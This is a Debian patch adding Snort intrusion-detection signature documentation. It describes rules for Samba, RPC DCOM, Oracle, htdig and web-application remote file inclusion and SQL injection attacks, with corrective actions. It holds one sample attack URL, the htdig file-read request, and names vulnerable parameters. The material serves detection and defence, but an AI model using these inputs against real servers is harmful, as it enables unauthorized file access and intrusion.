Description: Signature documentation
This patch includes the documentation for different signatures
provided in the package.

Author: Javier Fernandez-Sanguino Pea <jfs@debian.org>
Origin: vendor
Last-Update: 2013-08-16


--- /dev/null
+++ b/doc/signatures/2972.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+536
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000361.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000361
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Fastpublish CMS" application running on a webserver. Access to the file "email_an_benutzer.php" using a remote file being passed as the "config[fsBase]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "config[fsBase]" parameter in the "email_an_benutzer.php" script used by the "Fastpublish CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Fastpublish CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000580.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000580
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_view.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "cat_view.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/292.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid: 292
+
+--
+Summary:
+Versions of the file sharing software Samba 1.9.19 and prior contain a buffer overflow condition that can be exploited by supplying an overly long password to the Samba server.
+
+--
+Impact:
+System compromize presenting the attacker with the opportunity to
+gain remote access to the victim host or execute arbitrary code with the privileges of the user running the Samba server.
+
+--
+Detailed Information:
+Samba is used to share files and printers between hosts on a network. A buffer overflow in the handling of passwords exists such that an overly long password can trigger the vulnerability presenting the attacker with an opportunity to remotely compromise the server running the Samba software.
+
+Affected Systems:
+	Samba 1.9.19 and prior
+
+--
+Attack Scenarios:
+The attacker would need to supply an excessively long password.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest version of Samba.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0182
+
+Bugtraq:
+http://www.securityfocus.com/bid/1816
+
+--
--- /dev/null
+++ b/doc/signatures/3354.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3354
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1601.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+1601
+
+--
+Summary:
+This event is generated when an attempt is made to read a file on a host using a well known vulnerability in htdig.
+
+--
+Impact:
+Severe. Unauthorized file access
+
+--
+Detailed Information:
+Some versions of htdig allow inclusions to be made from configuration files as a parameter to the htsearch function. Any file can be included by enclosing it in single quotes ('foo').
+
+Using this vulnerability, any single quoted input string (`....`) is included as an index file by htsearch. This allows an attacker to read any file on the host.
+
+--
+Affected Systems:
+HTDig versions 3.1.1, 3.1.2, 3.1.3, 3.1.4 and 3.2.0b1
+
+--
+Attack Scenarios:
+A input form with a textbox named "Exclude" and http post action handled by htsearch or a url similar to http://www.foo.com/cgi-bin/htsearch?Exclude=%60/anyfile%60 can be used to access files on your host. %60 is the single quote caracter "`".
+
+--
+Ease of Attack:
+Simple. No exploit scripts required
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq:
+http://www.securityfocus.com/bid/1026
+
+--
--- /dev/null
+++ b/doc/signatures/1145.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1145
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1440.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1440
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/576.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+576
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) amountd (also known as autofsd) is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port amountd is using.  Attackers can also learn what versions of the amountd protocol are accepted by amountd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as amountd run.  The amountd RPC service is used by UNIX hosts to automatically mount and unmount autofs files.  It can use name service maps to find file systems to be mounted.  A vulnerability is present in autofsd that allows an attacker to execute arbitrary commands.  The attacker requests a map name that is executable, followed by a malformed client key and commands to be executed.  The server improperly interprets the input and executes the commands.
+
+--
+Affected Systems:
+IBM AIX 4.3, SGI IRIX 6.2, 6.3, 6.4, 6.5, and 6.5.1.
+
+--
+Attack Scenarios:
+An attacker can craft an amountd request that executes arbitrary commands on the remote file system. 
+
+--
+Ease of Attack:
+Easy.  Exploit code is widely available.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access amountd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for amountd, not probes of the amountd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the amountd service itself. An attacker may attempt to go directly to the amountd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/332/info/
+
+Arachnids:
+http://www.whitehats.com/info/IDS19
+
+
+--
--- /dev/null
+++ b/doc/signatures/2725.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2725
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_nchar
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2697.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+2697
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter file.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2619.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2619
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "alter_master_repobject" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "type" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck634.html
+
+--
--- /dev/null
+++ b/doc/signatures/1374.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+1374
+
+--
+Summary:
+Attempted .htgroup access via web
+
+--
+Impact:
+Attempt to gain information on group access permissions on a webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the user and administration groups used on a webserver. The .htgroup file lists the groups allowed to access resources on a webserver. The attacker could possibly gain information needed for other attacks on the host.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '.htgroup'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Disallowing viewing of this file via a URI is suggested. For Apache webservers add the following to httpd.conf and restart the server.
+
+<Files ~ "^\.ht">
+    Order allow,deny
+    Deny from all
+</Files>
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2542.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2542
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-CERT:
+http://www.us-cert.gov/cas/techalerts/TA04-104A.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000696.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000696
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VCard PRO" application running on a webserver. Access to the file "create.php" with SQL commands being passed as the "card_id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "card_id" parameter in the "create.php" script used by the "VCard PRO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VCard PRO
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1306.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1306
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3336.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3336
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1272.txt
@@ -0,0 +1,71 @@
+Rule:  
+
+--
+
+Sid:
+1272
+
+--
+
+Summary:
+This event is generated when an attempt is made to probe a host for the
+sadmind RPC service.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+Certain versions of sadmind on Solaris systems are vulnerable to a
+remotely exploitable buffer overflow condition. This event indicates
+that an attempt has been made to determine if the service is available
+on the target host.
+
+--
+Affected Systems:
+	Solaris 2.5 through 2.7
+ 
+--
+Attack Scenarios:
+An attacker runs an automated tool that connects to portmapper of the
+target host, probes for RPC, and repeatedly attacks the host to brute
+force the offset in the buffer overflow.
+
+--
+Ease of Attack:
+Simple. Tools are available and exploit code exists to exploit
+vulnerabilites in sadmind.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the sadmind service.
+
+Disallow access to RPC services from hosts external to the protected
+network
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by David Wilburn <bug@gecko.roadtoad.net>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/866/exploit/
+
+CERT:
+http://www.cert.org/advisories/CA-1999-16.html
+
+--
--- /dev/null
+++ b/doc/signatures/2343.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2343
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with WuFtpd STOR command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+WuFtpd is an FTP server based on BSD ftpd. A vulnerability exists 
+with the STOR command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the STOR 
+command.
+
+The issue exists in the SockPrintf() function. A server using the
+MAIL_ADMIN option to send email notifications to the administrator when
+files are uploaded to the server, is vulnerable to the attack. It is
+possible for an attacker to send malformed data to the store() function
+via sockprintf() that will cause the overflow condition to occur, the
+error can be generated by the attacker creating a filename greater than
+32768 bytes in length.
+
+--
+Affected Systems:
+	
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the STOR 
+command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use scp as an alternative to ftp
+
+Disallow ftp access to internal resources from external sources
+
+Disable the MAIL_ADMIN option
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/321.txt
@@ -0,0 +1,65 @@
+Rule: 
+
+--
+Sid: 321
+
+-- 
+Summary: 
+An information leak exploit against the old Solaris finger daemon
+
+-- 
+Impact: 
+Intelligence gathering activity. The attacker may be trying to obtain a list of accounts on the victim host.
+
+--
+Detailed Information:
+The rule generates an event when an attempt is made to exploit a bug in the Solaris "fingerd" daemon. The bug allows the attacker to obtain the lists of accounts existing on the Sun system by issuing a specially crafted finger request. 
+
+Obtaining a list of accounts may precipitate a password guessing attack, an email attack or other abuses against those accounts.
+
+--
+Attack Scenarios: 
+An attacker may learn that a "guest" account exists on the system and has never been used. He might then guesse the password for this account and is now able to log in to the system remotely using telnet or ssh for example. This might then lead to further system compromise and escalated privileges for the attacker.
+
+-- 
+Ease of Attack: 
+Simple
+No exploit software required
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Look for other IDS events involving the same IP addresses
+
+Check system logs for suspicious logins to the affected system, 
+
+Disable the fingerd daemon 
+
+Apply a vendor patch that removes the vulnerability
+
+--
+Contributors: 
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10788
+
+Securiteam
+http://www.securiteam.com/unixfocus/6B00M0U2UW.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000399.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000399
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "flbchart.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "flbchart.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
